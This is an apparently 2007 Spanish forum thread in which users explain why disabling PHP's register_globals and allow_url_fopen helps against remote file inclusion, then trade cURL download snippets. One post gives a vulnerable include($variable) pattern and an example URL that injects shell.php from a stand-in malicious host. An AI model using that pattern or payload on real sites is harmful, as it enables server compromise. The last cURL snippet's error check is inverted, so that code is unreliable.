seguridad en php

bruj0 · 23 Enero 2007, 01:28 AM

Hola, he estado leyendo sobre el tema de la seguridad en php, pero hay cosas que no he entendido bien. He leido en varios sitios que para aumentar la seguridad hay que tener deshabilitado allow_url_fopen y no entiendo porque realmente. Esto no es para que el servidor apache te permita tratar las URL como ficheros? Entonces como aumenta la seguridad si está off ?

Otra cosa que no entiendo es que tambien recomiendan desactivar register_globals, tampoco entiendo porque dejando esto en off aumenta la seguridad del servidor; ya que el impedimento que le veo a esto esque no se pueden pasar variables atraves de la url.

En fin , me gustaría que alguien me explicara esto un poco mas afondo, gracias

alone-in-the-chat · 23 Enero 2007, 02:23 AM

Primero lo de register_globals Se tiene que tener deshabilitado para que obliguen al programador a manejar las variables que lleguen por el metodo POST o GET de la sgte forma

Código [Seleccionar]


$_POST['variable']

$_GET['variable']

si el programador manejase una variable llamada "variable" en su sitio y la
usara para realizar un include algo asi

Código [Seleccionar]


include($variable);

si register_globals estuviese habilitado tu podrias acceder a la pagina de esta manera http://www.pagina.com?variable=http://www.webmaliciosa.com/shell.php
y el include se haria del archivo shell.php
mejor dicho incluirias codigo malicioa en tu pagina
pero si register_globals estuviese en off esto no funcionaria por que deberia haber un include de la forma

Código [Seleccionar]


include($_GET['variable']);

y eso es muy poco visto

ahora mira allow_url_fopen
deshabilita las url remotas en funciones como fopen , file_get_contents, etc
por ejemplo tu no podrias hacer esto

Código [Seleccionar]


fopen("http.//www.webmaliciosa.com/shell.php","r")
file_get_contents("http.//www.webmaliciosa.com/shell.php")

Espero haberte ayudado aunque sea un poco
Saludos.

bruj0 · 23 Enero 2007, 02:33 AM

Cita de: alone-in-the-chat en 23 Enero 2007, 02:23 AM
ahora mira allow_url_fopen
deshabilita las url remotas en funciones como fopen , file_get_contents, etc
por ejemplo tu no podrias hacer esto
Código [Seleccionar] Expandir
fopen("http.//www.webmaliciosa.com/shell.php","r") file_get_contents("http.//www.webmaliciosa.com/shell.php")
Espero haberte ayudado aunque sea un poco
Saludos.

Sigo sin entender esto, pero esto en el caso de estar habilitado comprometeria la seguridad de otros servidores no del tuyo no? pq con esto lo que haces es que tu puedas tratar urls externas como ficheros y no alreves. O esque no lo estoy entendiendo bien??

alone-in-the-chat · 23 Enero 2007, 02:45 AM

el allow_url_fopen permite eso de arriba de incluir codigo de otros sitios en tu pagina web
deshabilitado esa opcion y la de register global en off seria un poco mas complicado que ataquen tu pagina con RFI
Saludos

bruj0 · 23 Enero 2007, 04:04 AM

entonces teniendo allow_url_fopen desactivado del servidor, como se podria hacer para comprobar por ejemplo si existe una imagen fuera del servidor? pq yo antes esto lo hacia con

Código [Seleccionar]

if ($file = fopen( "http://www.google.es/imagen.jpg",  "r"))
echo "si";
else
echo "no":

pero teniendo esto desactivado no se como hacerlo

Ertai · 23 Enero 2007, 12:23 PM

Usando sockets en php se podría, aunque es mucho lío.

Si te interesa te puedo pasar alguna dirección para aprender.

bruj0 · 23 Enero 2007, 14:22 PM

Si, pasame lo que tengas al respecto porfavor.

He encontrado una libreria que se llama CURL que maneja URLS y te permite leer por ejemplo webs aun teniendo allow_url_fopen off. Tambien se pueden copiar ficheros externos a tu servidor pero lo que no se es como verificar si el archivo que pretendes copiar existe o no. La función que he encontrado para copiar una imagen a tu server sería asi:

Código [Seleccionar]

<?
function recibe_imagen ($url_origen,$archivo_destino){
$mi_curl = curl_init ($url_origen);
$fs_archivo = fopen ($archivo_destino, "w");
curl_setopt ($mi_curl, CURLOPT_FILE, $fs_archivo);
curl_setopt ($mi_curl, CURLOPT_HEADER, 0);
curl_exec ($mi_curl);
curl_close ($mi_curl);
fclose ($fs_archivo);
}
?>

Con esto copias la url_oringen a un destino en tu server, pero claro, si no existe el origen te crea un archivo de 1kb con el nombre de destino, con lo cual es una chapuza. Alguno sabría como hacer la verificación de que el archivo que pretendes copiar existe?

alone-in-the-chat · 23 Enero 2007, 15:39 PM

te haces mucho lio si lo que deseas es usar curl para bajarte el contenido de una archivo puedes hacerlo asi

Código [Seleccionar]


$ch = curl_init();
$url = "http://www.misitio.com/index.html"
curl_setopt($ch,CURLOPT_URL,$url); 
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
$file = curl_exec($ch);
if ($file != "")
{
$fs_archivo = fopen ($archivo_destino, "w");
fwrite($fs_archivo,$file);
fclose ($fs_archivo);
}else{
echo curl_error($ch);
}

El curl es un agente de internet no solo te permite establecer conexion http si no tb ftp , https , etc , y es una de las mejores extensiones del php.
mandame un privado x alli tengo una edicion del php architect con mucha informacion del curl
Saludos,.

bruj0 · 23 Enero 2007, 16:56 PM

Mandame toda la documentación que tngas si puedes alone.

El codigo que has puesto no es correcto ya que $file siempre va a ser distinto de "", ya que si la ruta es incorrecta te devuelve una pagina de error.

Estoy haciendolo de otra manera y creo q casi lo tengo, a ver si posteo en cuanto lo tnga el codigo

alone-in-the-chat · 23 Enero 2007, 17:02 PM

xDº ok entonces
trabaja con el valor de curl_error(); o curl_errno(); que te devuelve 0 en caso no haya ningun error

je si lo de file se me paso
voy a buscar la e-zine en si

Código [Seleccionar]


if (curl_errno($ch) != 0)
{
$fs_archivo = fopen ($archivo_destino, "w");
fwrite($fs_archivo,$file);
fclose ($fs_archivo);
}else{
echo curl_error($ch);
}